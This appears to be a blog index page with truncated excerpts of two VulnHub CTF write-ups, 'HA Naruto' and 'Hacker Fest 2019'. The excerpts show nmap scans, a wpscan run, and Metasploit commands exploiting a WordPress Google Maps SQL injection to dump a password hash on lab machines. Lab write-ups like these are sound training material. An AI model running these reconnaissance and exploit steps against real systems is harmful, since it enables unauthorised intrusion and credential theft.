Vulnerable Machine Writeup * VULNHUB

HA NARUTO (VULNHUB)

LINK: https://drive.google.com/file/d/1RK6ZdBstyw886OmpExUItK4_soMLMUxD/view?usp=sharing root@kali:~/.ssh# nmap -A 192.168.222.152 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-28 08:18 GMT Nmap scan report for 192.168.222.152 Host is up (0.00017s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 dc:8d:8b:ee:53:c1:b1:86:9a:a8:fd:2a:af:82:bd:24 (RSA) | 256 e6:86:b7:62:d8:de:17:8e:df:df:ec:43:42:74:e5:21 […]

Vulnerable Machine Writeup * VULNHUB

HACKER FEST 2019 (VULNHUB)

Vulnhub Link: https://download.vulnhub.com/hackerfest/HF2019-Linux.ova root@kali:~# nmap -A 192.168.0.20 port : 21 , 22 , 80 , 10000 Enumeration : http://192.168.0.20 now on terminal root@kali:~# wpscan –url http://192.168.0.20/ WordPress Google maps Sqli Exploit : msf5 > use auxiliary/admin/http/wp google_maps_sqlimsf5 auxiliary(admin/http/wp_google_maps_sqli) > set rhosts 192.168.0.20msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit we get the output webmaster $P$Bsq0diLTcye6ASlofreys4GzRlRvSrl root@kali:~# gedit hash webmaster […]